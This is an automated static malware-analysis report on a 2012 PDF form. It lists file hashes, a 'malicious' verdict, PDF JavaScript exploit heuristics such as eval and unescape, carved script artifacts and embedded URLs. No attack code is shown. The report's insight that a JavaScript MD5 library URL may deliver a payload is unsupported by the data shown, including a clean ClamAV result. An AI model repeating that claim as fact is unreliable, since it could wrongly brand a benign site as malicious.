Malicious PDF — malware analysis report

Static analysis result for SHA-256 1863a08cb2e4d91b…

MALICIOUS

PDF

213.2 KB Created: 2012-03-27 11:53:12 +02:00 Authoring application: swissforms Solutions
MD5: 9139544178d2257c77b9d4e8e43f3cf0 SHA-1: deeb93cf6f4faf7bf5556b1bafb384454b4a6d81 SHA-256: 1863a08cb2e4d91b0d82739c3d56c2e1975f799b88bc57f61a8dd481d0d477b1
214 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF contains multiple JavaScript streams, several of which trigger critical heuristics related to eval() and unescape() calls, indicating obfuscated code execution. The presence of a PDF JavaScript exploit cluster strongly suggests the sample is designed to exploit a vulnerability to execute arbitrary code. The embedded URL 'http://pajhome.org.uk/crypt/md5' is suspicious and may be used to download a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.6150

Heuristics 10

  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • eval() call high PDF_EVAL
    eval() found — commonly used for obfuscated exploit execution (matched inside decoded stream)
  • unescape() call high PDF_UNESCAPE
    unescape() found — often used to decode shellcode in PDF JS exploits (matched inside decoded stream)
  • JavaScript action low PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Additional-actions dictionary low PDF_AA
    PDF defines /AA (Additional Actions) that references an executable action (JS/JavaScript/Launch/SubmitForm) — can auto-trigger on document or widget events. Form-field calc/format/validate/keystroke handlers in legitimate interactive forms commonly fire this, so it is reported as a low-weight signal; weaponised auto-execution is flagged by stronger rules (PDF_OPENACTION, encrypted-with-JS, etc.)
  • String.fromCharCode low PDF_FROMCHARCODE
    String.fromCharCode found — used to construct payload strings dynamically. Common in benign JavaScript libraries for codepoint manipulation, so this alone is informational; weaponised use is also caught by the dedicated fromCharCode-stage and exploit-shape rules. (matched inside decoded stream)
  • AcroForm button with action trigger low PDF_ACROFORM_BUTTON
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://pajhome.org.uk/crypt/md5
    • http://www.unicode.org/reports/tr35/tr35-11.html#Number_Format_Patterns
    • http://www.unicode.org/reports/tr35/tr35-11.html#Lenient_Parsing
    • http://unicode.org/reports/tr18/

Extracted artifacts 26

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0077_000.js
033cfe2ae60e1528f65c10fad3d200ead3549102d1ab209f12b58088bf2f12f5		 pdf-javascript-stream PDF /JS object 77 at offset 0x1C07D 45 bytes
javascript_obj0001_004.js
09cc9bcbd59acf82e2be4a41727eedce5a538a736f2d65749c8b14153d70c125		 pdf-javascript-stream PDF /JS object 1 at offset 0xF 4875 bytes
javascript_obj0004_005.js
c2f9e45a2d3f7ffd224908e29db59dec89b6f57df138d3bb5892cfc8e5e92c26		 pdf-javascript-stream PDF /JS object 4 at offset 0x680 17129 bytes
javascript_obj0006_006.js
157d94c4373fc7674528b2b92bd73c7fb605ba41abc50f521589bd013af87b68		 pdf-javascript-stream PDF /JS object 6 at offset 0x1508 21193 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
javascript_obj0008_007.js
e6148b768af5b12460cf3e62fbab899b427b7493847763e208cddbfbe94685cd		 pdf-javascript-stream PDF /JS object 8 at offset 0x36E8 33138 bytes
javascript_obj0010_008.js
7a0d61602467a3ebb51eeb3dc0b4e5557e5cf228aa7352a5e4c4de5b6ad1e63e		 pdf-javascript-stream PDF /JS object 10 at offset 0x5D2E 144013 bytes
javascript_obj0012_009.js
5076026448694df07d81995a6f52f2135c18b2bd6d0340fdaeebe7c5d9c2e63d		 pdf-javascript-stream PDF /JS object 12 at offset 0x12A1A 8595 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
javascript_obj0014_010.js
f667de1ba2f5689c2db6ca8efec22f4cae905543c7e55765301e47c9d3e39d66		 pdf-javascript-stream PDF /JS object 14 at offset 0x135F8 1049 bytes
javascript_obj0016_011.js
b6b999b2adc788b5c0dc152162423f5f3b63e2f337dfedd2c9460233e3dfeb59		 pdf-javascript-stream PDF /JS object 16 at offset 0x138AE 6511 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
javascript_obj0018_012.js
6bf6a9f966c7e84faccf5e1acbfdf2980a18334f7c940bcfc5fb9e40ee1ba433		 pdf-javascript-stream PDF /JS object 18 at offset 0x13F28 10822 bytes
javascript_obj0020_013.js
0ef5292eaf41a7acfb5be96479c28e894fecc14d034141148df12559285bac3f		 pdf-javascript-stream PDF /JS object 20 at offset 0x14766 16050 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
javascript_obj0022_014.js
171aac8e2208b35087228e919d8c6b105689701aebd7f411e407cdb6ab3fbd35		 pdf-javascript-stream PDF /JS object 22 at offset 0x1538A 14156 bytes
javascript_obj0024_015.js
357ea0785b09f7df52440b553e24163e28a33a0338f6e8362055f93fb7167ae6		 pdf-javascript-stream PDF /JS object 24 at offset 0x16151 24495 bytes
javascript_obj0026_016.js
188a908fa79d1ccbba0b7fd097a9dd6d806a0b6a12816b4d6f1fa830305aed24		 pdf-javascript-stream PDF /JS object 26 at offset 0x1778E 2847 bytes
javascript_obj0028_017.js
a862c3ff0be4b6e8e1a4ed20ca59fdded0cb583d2442c945783e90d4e1f7a7af		 pdf-javascript-stream PDF /JS object 28 at offset 0x17B83 10040 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
javascript_obj0030_018.js
e66c83b43272af17b0ed43ded35819c9f2825ef88d352cce828881d135b64e16		 pdf-javascript-stream PDF /JS object 30 at offset 0x18440 4291 bytes
javascript_obj0032_019.js
f0ec97d840ccf21d7d3207b6e09077506386513958c94020bc39ca48dfe900a1		 pdf-javascript-stream PDF /JS object 32 at offset 0x18943 11981 bytes
javascript_obj0034_020.js
e1eb1ae9a28ca6809e490ab94557d9217f0ed671a55379737b41e00e159fd8d3		 pdf-javascript-stream PDF /JS object 34 at offset 0x19439 3240 bytes
javascript_obj0036_021.js
5c846df3aa78f4be63ebcbf1ee92a28b359eed60e284693e5daa5203b284a497		 pdf-javascript-stream PDF /JS object 36 at offset 0x1981C 8284 bytes
javascript_obj0062_022.js
88cf83eacfa4ab997462d207c0c2ed6b53626fc3794ce976e7bdf29d2c84f5d4		 pdf-javascript-stream PDF /JS object 62 at offset 0x1A156 213 bytes
javascript_obj0068_023.js
f24f44ca9d60dd42a63432989aaa4b625b3f58ca8efbcc9b7f760bb4a53d1e2a		 pdf-javascript-stream PDF /JS object 68 at offset 0x1A21C 107 bytes
javascript_obj0073_024.js
d525969f37c2901a8a7bbb3f0c165714e656d3de62dc328dfaca4fcf93c5f648		 pdf-javascript-stream PDF /JS object 73 at offset 0x1A2B4 22529 bytes
javascript_obj0075_025.js
92b7e8047d7db76b49f4b17cafb0874db7de5823f779184a767eb82d602c3560		 pdf-javascript-stream PDF /JS object 75 at offset 0x1B3B5 26599 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
font_00_sfnt_off00024424.bin
5eed140d5a671f128f7d4cc7e64d4eec766b38e1a6439b33e206bdb438ee7e0f		 pdf-font-stream PDF embedded font (sfnt) at offset 0x24424 21716 bytes
font_01_sfnt_off000262a0.bin
d95f58a119f91bee73a40907be6e78ab66835e98b1a3fa115966739358824f25		 pdf-font-stream PDF embedded font (sfnt) at offset 0x262A0 7520 bytes
font_02_sfnt_off0002cf67.bin
a6996f0f8cf243a903f852ac10837001b654e974e6d08713043a19bf9c48259d		 pdf-font-stream PDF embedded font (sfnt) at offset 0x2CF67 34636 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.